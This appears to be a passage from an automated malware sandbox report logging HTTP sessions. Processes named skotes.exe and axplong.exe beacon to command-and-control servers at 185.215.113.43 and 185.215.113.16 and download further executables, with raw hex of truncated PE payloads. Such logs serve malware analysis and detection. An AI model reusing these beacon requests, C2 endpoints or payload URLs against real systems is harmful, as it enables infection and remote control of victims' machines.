                                                      Sep 24, 2024 15:37:02.723123074 CEST1236INData Raw: 00 62 00 1e 02 01 00 d6 09 1a 02 01 00 1b 0a 1a 02 01 00 72 0a 1a 02 01 00 eb 08 1a 02 01 00 d3 08 1a 02 01 00 8e 00 1e 02 01 00 2f 09 1a 02 01 00 60 09 1a 02 01 00 05 0a 1a 02 01 00 11 00 22 02 01 00 01 00 26 02 01 00 21 00 2a 02 01 00 f8 0e 2e
                                                      Data Ascii: br/`"&!*.\M2:7-.<aAIFP J8"O"O"pO#4#
                                                      Sep 24, 2024 15:37:02.723131895 CEST1236INData Raw: 00 e6 01 9f 00 e9 00 fa 0c a5 00 a9 01 d4 0f ae 00 c9 00 97 0c b4 00 a9 01 a1 0c ba 00 81 00 e4 05 4d 00 f9 01 4b 0f c1 00 01 02 23 08 15 00 f9 00 4e 08 8a 00 f9 00 59 01 cb 00 f9 00 bf 0e 15 00 f1 01 ec 02 d1 00 f1 01 13 06 d1 00 a9 01 af 0c ba
                                                      Data Ascii: MK#NY).19AI
                                                      Sep 24, 2024 15:37:02.723144054 CEST1236INData Raw: 74 5f 43 68 65 63 6b 65 64 00 53 79 6e 63 68 72 6f 6e 69 7a 65 64 00 47 65 74 4d 65 74 68 6f 64 00 49 73 4e 75 6c 6c 4f 72 57 68 69 74 65 53 70 61 63 65 00 64 65 66 61 75 6c 74 49 6e 73 74 61 6e 63 65 00 67 65 74 5f 4b 65 79 43 6f 64 65 00 73 65
                                                      Data Ascii: t_CheckedSynchronizedGetMethodIsNullOrWhiteSpacedefaultInstanceget_KeyCodeset_AutoScaleModeset_SizeModePictureBoxSizeModeset_ImageAddRangeInvokeIDisposableRuntimeTypeHandleGetTypeFromHandleFileget_StyleDockStyleset_FormBorder
                                                      Sep 24, 2024 15:37:02.723150969 CEST1236INData Raw: 69 61 6c 6f 67 00 43 6f 6d 70 75 74 65 53 74 72 69 6e 67 48 61 73 68 00 70 61 74 68 00 67 65 74 5f 4c 65 6e 67 74 68 00 69 00 67 65 74 5f 42 6c 61 63 6b 00 62 75 74 74 6f 6e 31 5f 43 6c 69 63 6b 00 61 64 64 5f 43 6c 69 63 6b 00 64 65 6c 65 74 65
                                                      Data Ascii: ialogComputeStringHashpathget_Lengthiget_Blackbutton1_Clickadd_ClickdeleteToolStripMenuItem_ClickpasteToolStripMenuItem_ClicksaveToolStripMenuItem_ClickblackToolStripMenuItem_ClickselectAllToolStripMenuItem_ClickopenToolStripMenuI
                                                      Sep 24, 2024 15:37:02.727967978 CEST1236INData Raw: 74 5f 47 72 69 70 4d 61 72 67 69 6e 00 73 65 74 5f 49 63 6f 6e 00 4d 65 73 73 61 67 65 42 6f 78 49 63 6f 6e 00 41 70 70 6c 69 63 61 74 69 6f 6e 00 73 65 74 5f 4c 6f 63 61 74 69 6f 6e 00 53 79 73 74 65 6d 2e 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e
                                                      Data Ascii: t_GripMarginset_IconMessageBoxIconApplicationset_LocationSystem.ConfigurationSystem.GlobalizationSystem.ReflectionControlCollectionToolStripItemCollectionMessageBoxDefaultButtonset_AcceptButtonRuntextBox1_KeyDownadd_KeyDownMetho


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      115192.168.2.749881185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:02.629291058 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:37:03.323909998 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:03 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      116192.168.2.749882185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:04.114681005 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 32 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000284001&unit=246122658369
                                                      Sep 24, 2024 15:37:04.807163000 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:04 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      117192.168.2.749883185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:04.874577999 CEST49OUTGET /inc/2.exe HTTP/1.1
                                                      Host: 185.215.113.16
                                                      Sep 24, 2024 15:37:05.586775064 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:05 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 689664
                                                      Last-Modified: Mon, 05 Aug 2024 00:09:39 GMT
                                                      Connection: keep-alive
                                                      ETag: "66b01843-a8600"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2a 18 b0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 7a 0a 00 00 0a 00 00 00 00 00 00 6e 99 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 99 0a 00 57 00 00 00 00 a0 0a 00 20 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL*fzn @ @W H.textty z `.rsrc |@@.reloc@BPH(JD>n82ax^s(OL~g?M6;u=kdw-X^k|eQvi"nsWDl\sUvCEix1G5eMk[wx1)w_Tp2FSU@6'qB]OR0/ES_{|H?<wmfTe_lg']^ulC{d0sGFovtL2k|wSrB1Y2W",}7*c^Hp!UgM7mOG1
                                                      Sep 24, 2024 15:37:05.586792946 CEST1236INData Raw: 49 73 f1 3e f2 c0 88 0d 3f 70 45 48 b3 a8 de f9 72 4f e7 1b fc c0 3a 5c ae 97 0f db 84 5d 9f 83 36 eb 1e e4 f1 bb c4 78 0e b3 86 b0 76 98 23 95 5a 78 ee c5 91 44 f3 78 a3 12 7e 57 c7 7e d5 ae e4 6c ff 33 9f 28 ee 9f e7 39 8e b0 f2 97 5c eb 9f 10
                                                      Data Ascii: Is>?pEHrO:\]6xv#ZxDx~W~l3(9\Z|yc$pcH(X9_JSb\b7c+b0im5iz>3?zA9}u"i\[^YaWT7_S;W_K]F_6i<H4PH[GT5
                                                      Sep 24, 2024 15:37:05.586811066 CEST448INData Raw: c2 96 ad 7b 6c 05 a1 15 61 dd ff 22 ed 6f 4d 3a 3f f2 85 7d ba e9 27 67 5e 41 c9 f8 47 ad de e1 a9 05 52 a1 ae 24 55 eb 5e 7d cd 6a 1f 3b 6a dd 6e 2d cd ca 30 f3 46 bd 3a b5 95 5d 89 89 bb 84 6b 55 46 fc aa a2 4e ed 59 bd 99 d9 40 1d bc 1d 34 f9
                                                      Data Ascii: {la"oM:?}'g^AGR$U^}j;jn-0F:]kUFNY@4|qN}hGrQ9P&Uu[Dv*jf Tt^6`|hfg2Eq6Ny[5+H]R3+|u1m~c>4![F
                                                      Sep 24, 2024 15:37:05.586822033 CEST1236INData Raw: 3e 6b ea 3c b8 fb 98 a9 6a cc 34 ee ec 84 ea 12 b2 82 6c c6 fc 36 c5 f9 df 6b 86 1d 8c 80 18 e9 ab 7d d0 39 a7 c1 36 f5 42 05 5d 7b 15 dd bd 82 34 e6 a9 f3 09 f6 f3 a5 52 a0 9c a5 de 9a 28 e3 b9 57 84 ec 52 22 8a 98 3e a4 2f 2d f2 7e 27 9e a7 f2
                                                      Data Ascii: >k<j4l6k}96B]{4R(WR">/-~'$UPHA\MbCh{a=D\7?{6]ZfnMGH,z-F]`M9%)A6CNJ^}0>[W.%62aeRMm\eRt
                                                      Sep 24, 2024 15:37:05.586833000 CEST1236INData Raw: 65 1d f2 4a d1 ca 69 f0 a1 ec 99 7b 9b 27 1e ad a6 95 a9 79 18 a0 43 d7 14 59 3d 7f 86 4d ff e8 0d 69 ea 3c 96 4b 60 fb 1f 48 7c 07 84 5b 95 70 6d e2 21 7e b9 62 e9 35 55 1b 3a 93 91 9a aa 49 72 d9 52 6d 66 0c f0 b9 40 86 05 7a c4 da 1f a4 bc 24
                                                      Data Ascii: eJi{'yCY=Mi<K`H|[pm!~b5U:IrRmf@z$IjK<<hEth2.k[O3o@|JeIiTc\=:mR71,G_a+-Q?D,8kNc&KB;P{}Ebn`\G
                                                      Sep 24, 2024 15:37:05.586852074 CEST448INData Raw: 2e 4f e5 71 bf 05 5f aa d7 d6 b0 c4 e3 ed b4 9b 0b f4 aa f9 0c 6e 59 dc a6 67 90 c6 9e cc b9 2f 5a 86 1b 40 96 e5 a3 da 10 ef 57 55 c0 57 0c ac 62 28 38 8d fb 39 5c 8a 15 4e 08 db 76 55 a3 7a 7a 17 35 01 dd 0b 77 f5 57 ba 2b 87 ed a8 84 ad 3b 16
                                                      Data Ascii: .Oq_nYg/Z@WUWb(89\NvUzz5wW+;*4Wuoudk-PI/$vz' H[!$-'"$5Z|2&7!aH2'5e9.G0v3`?(_QM(1YLB>
                                                      Sep 24, 2024 15:37:05.586863041 CEST1236INData Raw: 30 8d 82 1f a7 67 e7 93 c5 24 51 95 46 e4 32 84 49 53 09 1f f8 0f 1d ee 28 13 13 bd b6 22 82 3e 42 c8 60 c9 2e 12 6d 59 63 7e 3c 69 e8 a2 03 b4 4c 1e b0 56 18 07 03 da d4 1a 71 3d a5 57 7a 42 19 79 53 f9 83 e4 3c 05 9c 27 1c e5 5b 42 24 03 66 6c
                                                      Data Ascii: 0g$QF2IS(">B`.mYc~<iLVq=WzByS<'[B$flj8ZS+YCW7rYlF2zTSPf,YxGG{VUi3/H096\n=t@ U 9ZuF34Y*_h{Z$;:xR9e
                                                      Sep 24, 2024 15:37:05.586874008 CEST1236INData Raw: 5c 8b a6 41 40 55 c9 f7 f1 55 11 2f 21 54 f1 cd e8 0c 28 94 45 50 d2 2f 07 97 a7 3f 64 01 dc 5a 69 a4 37 0d 4b 67 4e 31 01 94 94 56 5c b1 64 a0 6b 32 e5 f3 77 6d 5a 75 05 0b e6 61 85 93 6d 0c 46 ae 28 8d da 71 ca 6e ef dc 9c 79 03 c9 ae 49 2f 5e
                                                      Data Ascii: \A@UU/!T(EP/?dZi7KgN1V\dk2wmZuamF(qnyI/^*b'$?m~lHX&%>u-aj(E\=}}z{R "4=_xDCxMH5]NuPyYq~{F}L+_p
                                                      Sep 24, 2024 15:37:05.586889029 CEST1236INData Raw: b2 77 34 2f 53 58 a7 2d 52 26 13 10 5a 19 f7 04 17 65 bc 7f 43 8c bc d2 93 c9 73 53 dd 36 07 75 e0 67 d8 30 bf ad c6 ce 1d 39 98 a4 eb 61 1b 45 d2 bf 1d 7e c4 ef de 92 6e a9 99 1c b4 85 2c 19 8c 48 20 87 87 1e a8 58 bd 46 ee be 08 cf 25 0f b0 05
                                                      Data Ascii: w4/SX-R&ZeCsS6ug09aE~n,H XF%EE3E:N}Ozrd2b9fm5$G`aoYy~H}/Q8dhock%hw8jes?t0lz#P}"U9mqNr* V"
                                                      Sep 24, 2024 15:37:05.586904049 CEST104INData Raw: 8a 03 f2 3d d6 50 79 6c ef 70 cf 40 a9 d5 e5 cc f5 a3 b0 aa d5 ac 2c 9f 61 c1 d0 c9 c1 e9 95 35 31 b6 95 dd 5a 4f b4 53 08 c1 16 bc a2 1b 9a b0 10 d9 37 26 23 c7 50 6b 1e a6 5e 6e 98 e7 62 c4 60 1f d9 d5 2a 4d 3c c3 ff af 5f 2e 0f 73 db 0c dd 86
                                                      Data Ascii: =Pylp@,a51ZOS7&#Pk^nb`*M<_.sZ?EQ:!
                                                      Sep 24, 2024 15:37:05.592107058 CEST1236INData Raw: 44 3a 94 1f 36 a0 6c a3 96 a6 78 f7 4b 2b d6 6a cc b7 58 70 5c 9d d9 77 79 44 4f 80 65 1a 4a 4a 97 71 eb 0d 8a de 70 05 34 f9 e8 29 a1 93 78 cd b1 2e 5c a1 e6 55 68 15 73 94 a8 3a 4a 50 f6 bf 66 26 d9 b1 26 16 95 21 a8 74 40 6c 18 63 f8 1a 1f 33
                                                      Data Ascii: D:6lxK+jXp\wyDOeJJqp4)x.\Uhs:JPf&&!t@lc3!x hhf7l_zHxgaJ8AFpAFi&AYLm\bu{2v(oa|^O+[fT1r6YpzvKI


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      118192.168.2.749884185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:05.618717909 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:37:06.318713903 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:06 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      119192.168.2.749887185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:07.224361897 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 32 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000285001&unit=246122658369
                                                      Sep 24, 2024 15:37:07.964706898 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:07 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      120192.168.2.749888185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:07.831888914 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:37:08.554873943 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:08 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      121192.168.2.749889185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:07.984273911 CEST58OUTGET /dobre/splwow64.exe HTTP/1.1
                                                      Host: 185.215.113.16
                                                      Sep 24, 2024 15:37:08.692114115 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:08 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 1381143
                                                      Last-Modified: Fri, 13 Sep 2024 12:59:12 GMT
                                                      Connection: keep-alive
                                                      ETag: "66e43720-151317"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 4b 5a 65 25 2a 34 36 25 2a 34 36 25 2a 34 36 2c 52 b7 36 26 2a 34 36 2c 52 a7 36 34 2a 34 36 25 2a 35 36 89 2a 34 36 3e b7 9e 36 2b 2a 34 36 3e b7 ae 36 24 2a 34 36 3e b7 a9 36 24 2a 34 36 52 69 63 68 25 2a 34 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 cf e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 70 00 00 00 de 3e 00 00 42 00 00 99 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 f0 47 00 00 04 00 00 f4 26 15 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$aKZe%*46%*46%*46,R6&*46,R64*46%*56*46>6+*46>6$*46>6$*46Rich%*46PELGOp>B8@G&@40Gr?H.textop `.rdatab*,t@@.dataf>@.ndata ?.rsrcr0Gt@@.reloc2G4@B
                                                      Sep 24, 2024 15:37:08.692128897 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10
                                                      Data Ascii: U\}t+}FEuHHPuuu@KSV5WEPu@eEEPu@}eD@FRVVU+MMEFQNUMMVTU
                                                      Sep 24, 2024 15:37:08.692145109 CEST1236INData Raw: 04 00 55 8b ec 81 ec 10 02 00 00 53 56 57 8d 45 fc 50 a1 d0 16 7f 00 83 c8 08 50 33 db 53 ff 75 0c ff 75 08 ff 15 04 80 40 00 3b c3 75 69 8b 35 00 80 40 00 bf 05 01 00 00 eb 19 39 5d 10 75 4b 53 8d 85 f0 fd ff ff 50 ff 75 fc e8 b2 ff ff ff 85 c0
                                                      Data Ascii: USVWEPP3Suu@;ui5@9]uKSPuuWPSutu@jN;t$S5uuu@3@_^[9uuu@uU@@Vt5EPEPjj"PV
                                                      Sep 24, 2024 15:37:08.692156076 CEST1236INData Raw: 68 04 20 00 00 56 ff 15 70 80 40 00 85 c0 74 24 8b 45 08 3b c6 76 29 66 39 18 74 24 56 e8 5a 49 00 00 3b c3 74 0e 83 c0 2c 50 ff 75 08 e8 7e 46 00 00 eb 0c 33 c0 66 89 07 c7 45 fc 01 00 00 00 39 5d dc 0f 85 2b 17 00 00 68 04 20 00 00 57 57 ff 15
                                                      Data Ascii: h Vp@t$E;v)f9t$VZI;t,Pu~F3fE9]+h WWl@jMQVh SPSh@3EfjXPVDEj16EVPQh@uMpHVBV@tVE
                                                      Sep 24, 2024 15:37:08.692167044 CEST1236INData Raw: 8b c7 99 f7 f9 eb 1e 33 ff c7 45 fc 01 00 00 00 eb 3f 0b f9 eb 3b 23 f9 eb 37 33 f9 eb 33 33 c0 3b fb 0f 94 c0 8b f8 eb 28 3b fb 75 04 3b cb 74 09 33 ff 47 eb 1b 3b fb 75 f3 33 ff eb 13 3b cb 74 c5 8b c7 99 f7 f9 8b fa eb 06 d3 e7 eb 02 d3 ff 57
                                                      Data Ascii: 3E?;#7333;(;u;t3G;u3;tWCjjYPWVH@E=@;t^H;t?;u;u"uh@CYYh jS*IPEW@VA@PWA@VP';t+;uh@C
                                                      Sep 24, 2024 15:37:08.692178011 CEST1236INData Raw: 45 f0 66 89 0f c7 45 fc 01 00 00 00 3b c3 0f 84 b8 0d 00 00 50 6a 40 ff 15 24 81 40 00 89 45 08 3b c3 0f 84 a4 0d 00 00 50 ff 75 f0 53 ff 75 bc e8 c4 5b 00 00 85 c0 74 34 8d 45 bc 50 8d 45 f8 50 68 38 88 40 00 ff 75 08 e8 a5 5b 00 00 85 c0 74 1b
                                                      Data Ascii: EfE;Pj@$@E;PuSu[t4EPEPh8@u[tEpV;EpW;]u0@Qjh VWgNuEVWh@jh VWNuEVWh@E9jR
                                                      Sep 24, 2024 15:37:08.692189932 CEST1236INData Raw: 45 08 39 5d e4 75 44 6a 02 e8 5a ed ff ff 8b f8 3b fb 0f 84 10 f2 ff ff 6a 33 e8 52 ec ff ff 8b f0 56 57 ff 15 10 80 40 00 56 68 d8 30 41 00 ff 75 08 89 45 ec 68 50 85 40 00 e8 8f 3a 00 00 83 c4 10 57 ff 15 08 80 40 00 eb 3c 6a 22 e8 1f ec ff ff
                                                      Data Ascii: E9]uDjZ;j3RVW@Vh0AuEhP@:W@<j"Vuh$@l:E;uMQVP.E9]h;t=EEEjEjEWE9YSEEPSPSSSu3FWu
                                                      Sep 24, 2024 15:37:08.692200899 CEST1236INData Raw: 50 68 d0 f0 40 00 56 e8 b5 32 00 00 50 ff 15 54 81 40 00 e9 34 ed ff ff 6a 02 59 e8 67 e7 ff ff 89 45 f8 83 f8 01 0f 8c f8 03 00 00 b9 03 20 00 00 3b c1 7e 03 89 4d f8 66 39 1e 0f 84 7b ff ff ff 56 89 5d cc e8 77 32 00 00 89 45 bc 39 5d f8 0f 8e
                                                      Data Ascii: Ph@V2PT@4jYgE ;~Mf9{V]w2E9]fSEPjEPuX@J}@9]u0f}t2f}t+fEfwFMf;;u|EfEf9EtffjSjf97uSj
                                                      Sep 24, 2024 15:37:08.692214012 CEST1236INData Raw: 00 38 22 40 00 cc 22 40 00 fd 22 40 00 92 23 40 00 c1 23 40 00 f0 23 40 00 fb 24 40 00 65 26 40 00 fc 26 40 00 13 27 40 00 97 27 40 00 e3 27 40 00 80 28 40 00 ff 29 40 00 84 2a 40 00 e2 2a 40 00 fd 2a 40 00 23 2b 40 00 9f 2b 40 00 8a 2c 40 00 d7
                                                      Data Ascii: 8"@"@"@#@#@#@$@e&@&@'@'@'@(@)@*@*@*@#+@+@,@,@-@-@-@.@U.@n/@/@I0@0@0@0@0@2@6@:@?@U@Y@]@a@l@y@@@@U}ujhju4@E}uLTB
                                                      Sep 24, 2024 15:37:08.692226887 CEST1236INData Raw: 45 d8 50 e8 b3 27 00 00 8b 45 d8 a9 f0 ff ff ff 75 72 81 7d dc ef be ad de 75 69 81 7d e8 49 6e 73 74 75 60 81 7d e4 73 6f 66 74 75 57 81 7d e0 4e 75 6c 6c 75 4e 09 45 08 8b 45 08 8b 0d 54 b1 42 00 83 e0 02 09 05 c0 16 7f 00 8b 45 f0 89 0d 4c 16
                                                      Data Ascii: EP'Eur}ui}Instu`}softuW}NulluNEETBEL;EuEuAEp;vEujY;5{}WSu;E=TB+ 3jY9L9]t*5TB2jEPE;Euj@
                                                      Sep 24, 2024 15:37:08.697067022 CEST1236INData Raw: a8 60 84 00 75 0b 56 68 a8 60 84 00 e8 d3 24 00 00 ff 74 24 1c 68 00 20 7f 00 e8 c5 24 00 00 68 04 92 40 00 68 08 60 7f 00 e8 b6 24 00 00 6a 1a 5f be 20 1a 7b 00 a1 fc 15 7f 00 ff b0 20 01 00 00 56 e8 99 2c 00 00 56 ff 15 70 81 40 00 39 6c 24 10
                                                      Data Ascii: `uVh`$t$h $h@h`$j_ { V,Vp@9l$t?jVh@t-UV0$Vb,V ;tP@l$f`OuUS09-t{j'j'j';tH;tD;t@D$Pj(@Pt,D$$Ph


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      122192.168.2.749891185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:10.257106066 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:37:10.992233992 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:10 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      123192.168.2.749892185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:10.756098032 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
